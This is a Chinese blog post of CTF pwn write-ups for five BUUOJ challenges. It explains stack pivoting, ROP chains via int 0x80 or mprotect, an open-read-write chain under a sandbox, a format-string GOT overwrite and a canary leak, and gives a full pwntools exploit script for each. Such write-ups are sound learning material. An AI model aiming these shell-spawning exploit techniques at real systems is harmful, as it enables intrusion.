buuoj Pwn writeup 61-65

最新推荐文章于 2023-05-18 20:37:07 发布
最新推荐文章于 2023-05-18 20:37:07 发布
阅读量282 收藏
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/113805253
版权

61 gyctf_2020_borrowstack

保护

在这里插入图片描述
在这里插入图片描述平平无奇栈溢出,但是溢出的空间不够,考虑栈迁移。

要注意的是

# -*- coding: utf-8 -*-
from pwn import *

context(arch='i386', os='linux',log_level='debug')
#context.terminal=['tmux','splitw','-h']
r = remote('node3.buuoj.cn', 29952)
#r = process('./61')
libc = ELF("./64/libc-2.23.so")
elf=ELF("./61")

bss_addr = 0x601080
leave_ret = 0x400699
one_gadget = 0x4527a
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi = 0x400703
main_addr = 0x400626
ret_addr = 0x4004c9

r.recvline()
payload = 'a' * 96 + p64(bss_addr) + p64(leave_ret)
r.send(payload)

r.recvline()
payload = p64(ret_addr) * 20 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.sendline(payload)
#gdb.attach(r)
puts_addr = u64(r.recv(6).ljust(8, '\x00'))
libc_base = puts_addr - libc.sym['puts']
one_gadget += libc_base

print hex(libc_base)

payload = 'a' * 104 + p64(one_gadget)

r.recvline()
r.send(payload)

r.recvline()
r.sendline('aaaa')

r.interactive()

62 inndy_rop

保护
在这里插入图片描述在这里插入图片描述平平无奇栈溢出。

又是要么int 80h

exp

# -*- coding: utf-8 -*-
from pwn import *

context(arch='i386', os='linux',log_level='debug')
#context.terminal=['tmux','splitw','-h']
#r = remote('node3.buuoj.cn', 28533)
r = process('./62')
libc = ELF("./32/libc-2.23.so")
elf=ELF("./62")

int_80h = 0x0806c943
pop_eax = 0x080b8016
pop_dcb = 0x0806ed00
bss_addr = 0x080eb000
#gdb.attach(r)

payload = 'a' * 16+p32(elf.sym['read'])+p32(pop_dcb)+p32(0)+p32(bss_addr)+p32(0x10)
payload += p32(pop_eax) + p32(0xb)
payload += p32(pop_dcb) + p32(0) + p32(0) + p32(bss_addr)
payload += p32(int_80h) 

r.sendline(payload)

payload='/bin/sh\x00'
r.sendline(payload)

r.interactive()

要么mprotect。
exp

# -*- coding: utf-8 -*-
from pwn import *

context(arch='i386', os='linux',log_level='debug')
#context.terminal=['tmux','splitw','-h']
#r = remote('node3.buuoj.cn', 28533)
r = process('./62')
libc = ELF("./32/libc-2.23.so")
elf=ELF("./62")


bss_addr = 0x080Eb000 
#bss这里往后写一写,因为shellcode会把bss段上一些有用的东西给覆盖掉。

pop_dcb = 0x806ed00
shellcode = asm(shellcraft.sh())

payload = 'a' * 16 + p32(elf.sym['mprotect'])
payload += p32(pop_dcb) + p32(bss_addr) + p32(0x200) + p32(7)
payload += p32(elf.sym['read'])
payload += p32(bss_addr) + p32(0) + p32(bss_addr) + p32(0x200)

r.sendline(payload)

r.sendline(shellcode)

r.interactive()

或者直接用ROPgadget里面的工具。
ROPgadget --binary rop --ropchain

# -*- coding: utf-8 -*-
from pwn import *
from struct import pack

context(arch='i386', os='linux',log_level='debug')
#context.terminal=['tmux','splitw','-h']
#r = remote('node3.buuoj.cn', 28533)
r = process('./62')
libc = ELF("./32/libc-2.23.so")
elf=ELF("./62")

def payload():
    p = 'a'*16
    p += pack('<I', 0x0806ecda) # pop edx ; ret
    p += pack('<I', 0x080ea060) # @ .data
    p += pack('<I', 0x080b8016) # pop eax ; ret
    p += '/bin'
    p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
    p += pack('<I', 0x0806ecda) # pop edx ; ret
    p += pack('<I', 0x080ea064) # @ .data + 4
    p += pack('<I', 0x080b8016) # pop eax ; ret
    p += '//sh'
    p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
    p += pack('<I', 0x0806ecda) # pop edx ; ret
    p += pack('<I', 0x080ea068) # @ .data + 8
    p += pack('<I', 0x080492d3) # xor eax, eax ; ret
    p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
    p += pack('<I', 0x080481c9) # pop ebx ; ret
    p += pack('<I', 0x080ea060) # @ .data
    p += pack('<I', 0x080de769) # pop ecx ; ret
    p += pack('<I', 0x080ea068) # @ .data + 8
    p += pack('<I', 0x0806ecda) # pop edx ; ret
    p += pack('<I', 0x080ea068) # @ .data + 8
    p += pack('<I', 0x080492d3) # xor eax, eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0806c943) # int 0x80
    return p
shell = payload()
r.sendline(shell)
r.interactive()

63 [V&N2020 公开赛]warmup

保护
在这里插入图片描述在这里插入图片描述直接先给puts函数的地址。
为什么说是puts。
在这里插入图片描述看他的反汇编。
那个puts_ptr点过去就是puts的got表中的值。

在这里插入图片描述
这个东西看上去奇奇怪怪。

在这里插入图片描述果然是沙箱。

在这里插入图片描述平平无奇栈溢出。

总体思路就是通过read write open函数来打开,读取,并输出flag。

具体的实现方法有两种。

两个函数的栈连在一起构成巨大ROP链。
exp

# -*- coding: utf-8 -*
from pwn import *

r = remote('node3.buuoj.cn',28914)

libc=ELF("./64/libc-2.23.so")

r.recvuntil("0x")	
puts_addr = int(r.recv(12),16)
libc_base = puts_addr - libc.symbols['puts']

print hex(puts_addr)
print hex(libc_base)
    
pop_rdi=libc_base + 0x21102
pop_rsi=libc_base + 0x202e8
pop_rdx=libc_base + 0x1b92
open_addr = libc_base + libc.symbols['open']
free_hook = libc_base + libc.symbols['__free_hook']
read_addr = libc_base + libc.symbols['read']
puts_addr = libc_base + libc.symbols['puts']

payload = p64(0) + p64(pop_rsi) + p64(free_hook) + p64(pop_rdx) + p64(4)
payload += p64(read_addr)
payload += p64(pop_rdi) + p64(free_hook) + p64(pop_rsi) + p64(4)
payload += p64(open_addr)
payload += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(free_hook) + p64(pop_rdx) + p64(0x30)+p64(read_addr)
payload += p64(pop_rdi) + p64(free_hook) + p64(puts_addr)
r.sendafter("Input something: ",payload)
r.sendafter("What's your name?",'a'* 0x78+p64(pop_rdi))
r.send("flag")

r.interactive()

栈迁移的话也可以但是没有必要。

64 axb_2019_fmt32

保护
在这里插入图片描述在这里插入图片描述
乱七八糟有的没的。

就一个格式化字符串漏洞。
ret2libc就好了。

在这里插入图片描述

通过gdb调试判断一下偏移。
看得出来偏移是8。

然后想的是可以考虑覆盖got表的值,覆盖strlen吧,参数可控。

大数字写入的话保险点还是分开写吧。hn。

exp

# -*- coding: utf-8 -*
from pwn import *

context.log_level = "debug"
r = remote('node3.buuoj.cn',26945)
#r = process('./641')
elf = ELF('./641') 
libc = ELF("./32/libc-2.23.so")

strlen_got = elf.got['strlen']
printf_got = elf.got['printf']

payload = 'b' + p32(printf_got) + '22' + "%8$s"

r.recvuntil('Please tell me:')
r.send(payload)

r.recvuntil('22')
printf_addr = u32(r.recv(4))

print hex(strlen_addr)

libc_base = printf_addr - libc.sym['printf']

print hex(libc_base)

system_addr = libc_base + libc.sym['system']

high_one = (system_addr >> 16) & 0xffff
low_one = system_addr & 0xffff

payload = 'b' + p32(strlen_got) + p32(strlen_got+2)
payload += '%' + str(low_one-18) +'c%8$hn'
payload += '%' + str(high_one - low_one) + 'c%9$hn'

r.sendafter("Please tell me:",payload) 


payload = ';/bin/sh\x00'
r.sendafter("Please tell me:",payload)

r.interactive()

要注意的是泄露got表的时候不要泄露比如strlen,因为在你泄露的时候这个函数还没有被调用过,这就导致strlen里面放着还不是它的地址,因为延迟绑定机制。

所以泄露printf比较靠谱。

65 others_babystack

保护

在这里插入图片描述
在这里插入图片描述简简单单的栈溢出,但是有canary,绕过它就好了。

# -*- coding: utf-8 -*
from pwn import *

context.log_level = "debug"
r = remote('node3.buuoj.cn',29228)
#r = process('./65')
elf = ELF('./65') 
libc = ELF("./64/libc-2.23.so")

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi = 0x400a93
main_addr = 0x400908

payload = 'a' * 136 + '\xff'
r.recvuntil(">> ")
r.send("1")
r.send(payload)#

r.recvuntil(">> ")
r.send('2')
r.recvuntil("\xff")
canary = u64(r.recv(7).rjust(8,'\x00'))

print hex(canary)

payload = 'a' * 136 + p64(canary) + 'b' * 8
payload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.recvuntil(">> ")
r.send("1")
r.send(payload)

r.recvuntil(">> ")
r.send('3')

puts_addr = u64(r.recv(6).ljust(8, '\x00'))
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search("/bin/sh").next()

payload = 'a' * 136 + p64(canary) + 'b' * 8
payload += p64(pop_rdi) + p64(bin_sh)
payload += p64(system_addr)

r.recvuntil(">> ")
r.send('1')
r.send(payload)

r.recvuntil(">> ")
r.send('3')

r.interactive()
yongbaoii
关注
专栏目录
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 388
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 409
Buu CTF PWN题第五空间2019 决赛]PWN5的WriteUp
buuoj、xmctf、攻防世界刷题(web)write up
热门推荐
Love&Share
06-14 1万+
BUUOJ-每天两道,告别烦恼 WEB: [GXYCTF2019]BabySQli 输入用户名admin,发现可以登入,其他显示wrong user 源码中发现,存在base编码 先base32再base64解码,发现sql语句尝试去注入 首先尝试万能密码: 发现被拦截 尝试手工注入: 一个联合注入新知识 在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。 下面是一个自己的本地环境 数据库原本这几个用户名和密码 执行select * from flag WHERE username
buuoj helloword writeup
m0_73605862的博客
05-18 164
Step2:在com.example.helloworld文件目录下的smail下的com下的example下的helloword里面有MainActivity文件,点击进去发现flag。Step1:apk是安卓程序的后缀,所以这道题要用安卓的逆向工具apkIDE改之理,将程序用apkIDE打开。【来源】(buuoj)https://buuoj.cn/challenges#helloword。【思路】用apkide进行逆向分析。【题目】helloword。【题型】Reverse。
buuoj Pwn writeup 96-100
yongbaoii的博客
03-08 330
96 mrctf2020_easy_equation 保护 97 ciscn_2019_final_2 保护 98 ciscn_2019_s_9 保护 99 gyctf_2020_force 保护 100 [极客大挑战 2019]Not Bad 保护
buuoj Pwn writeup 86-90
yongbaoii的博客
03-08 251
86 axb_2019_brop64 保护 花里胡哨的。 平平无奇栈溢出。 from pwn import * context.log_level="debug" r = remote('node3.buuoj.cn',29649) elf = ELF('./86') libc = ELF("./64/libc-2.23.so") main=0x4007d6 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] pop_rdi=0x400963 r.r
buuoj Pwn writeup 66-70
yongbaoii的博客
02-23 291
66 ciscn_2019_final_3 保护 67 mrctf2020_shellcode 保护 68 hitcontraining_magicheap 保护 69 pwnable_start 保护 70 wustctf2020_getshell_2 保护
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 643
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2557
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
初学pwn-攻防世界(level0)
天柱的博客
08-27 1028
初学pwn-writeUp 攻防世界的第三道题目,level0。 首先还是先创建场景,使用nc进入远端,发现输出了一个Hello,World,之后什么都没有了,使用ls也没有反应,说明这需要我们获取shell了。 下载文件,先用checksec查看一下 这里简单介绍一些checksec这个工具: 1、Relro:No Relro(重定位表只读)   Relocation Read Only, 重定位表只读。重定位表即.got 和 .plt 两个表。   RELRO会有No RELRO、Partial RE
buuoj Pwn writeup 51-55
yongbaoii的博客
02-16 280
51 cmcc_simplerop 保护 52 pwnable_orw 保护 53 jarvisoj_level1 保护 54 roarctf_2019_easy_pwn 保护 这个全绿有点厉害。 55 picoctf_2018_buffer overflow 2 保护
buuoj Pwn writeup 21-30
yongbaoii的博客
02-05 1265
21 ciscn_2019_ne_5 保护 这个地方的strcpy函数,一看就估摸着有问题。 他把src那块的东西复制到了dest 但是你会发现 dest那里 0x48 但是你是可以往src那里输入东西的。 一口气能输128个字节,那这就造成了溢出。 那再说怎么利用 这个地方首先要注意他这里没有/bin/sh,但是有sh 而且还非常隐蔽 所以呢咱们这边推荐之后/bin/sh跟sh的搜索都用ROPgadget。 非常的nice 然后程序里面本来就有system函数,然后就一把梭。 exp from p
buuoj Pwn writeup 31-40
yongbaoii的博客
02-06 1444
31 [Black Watch 入群题]PWN 这个题有问题,就给了个附件,给的链接nc都连不上,做做题算了。 保护 可以往bss上写东西,然后有个溢出,但是溢出有限,只能覆盖到返回地址。 因为开了NX,所以不能写shellcode,因为溢出有限,所以先想到的是栈迁移。 把栈迁移到bss上,构造ROP,通过write函数泄露libc地址,然后就在bss上一把梭。 写法很多,我这里的话就直接先把’/bin/sh\x00’先写在了bss的位置。 exp from pwn import* from LibcSea
buuoj Pwn writeup 56-60
yongbaoii的博客
02-16 239
56 wustctf2020_getshell 保护 57 [V&N2020 公开赛]easyTHeap 保护 58 xdctf2015_pwn200 保护 59 ciscn_2019_n_3 保护 60 bbys_tu_2016 保护
buuoj Pwn writeup 146-150
yongbaoii的博客
05-28 239
146 SWPUCTF_2019_login 147 qctf2018_stack2 148 lctf2016_pwn200 149 sctf_2019_easy_heap 150 ciscn_2019_s_1
buuoj Pwn writeup 76-80
yongbaoii的博客
02-24 424
76 0ctf_2017_babyheap 保护 菜单堆。 allocate 堆的结构很明显了。要注意的是flag是四个字节。 fill 又是输入大小可以随便写。 又可以溢出。 free free的还是很干净的。 dump 平平无奇输出函数。 那么我们首先要考虑泄露libc的地址。泄露地址的方法只能去考虑unsorted bin,因为有溢出,可以完全仿照off by one,来制造overlapping,然后泄露地址啊,攻击malloc_hook,就下来了。 先来申请四个chunk。然后通过栈溢出改变c
buuoj Pwn writeup 196-200
yongbaoii的博客
06-12 434
196 gyctf_2020_bfnote 第一个漏洞点是有栈溢出,但是开了canary。第二个漏洞点是虽然会检测v4大小,但是检测完时候我们还能再次输入,所以我们会有一次任意输入的机会。 我们的想法就是改掉TLS结构体中的canary,然后rop即可。 tls结构体 typedef struct { void *tcb; /* Pointer to the TCB. Not necessarily the thread descriptor u
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 431
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道题能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
buuoj Pwn writeup 81-85
yongbaoii的博客
02-26 245
81 pwnable_hacknote 保护 菜单堆 add 申请好的结构是下面这样的。 delete 没有清理干净,uaf。 print 直接调用那个puts函数,那直接想到如果把它改成system,content里面改成’/bin/sh’,这不就好了嘛? 先申请一个0x8的,再申请0x100的,再全部释放掉,就会导致fastbin里面会有三个chunk,再申请0x8,就可以对chunk0的第一层chunk进行任意写。 因为uaf,导致我们还是能使用print函数,但是print的那个chunk被清
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值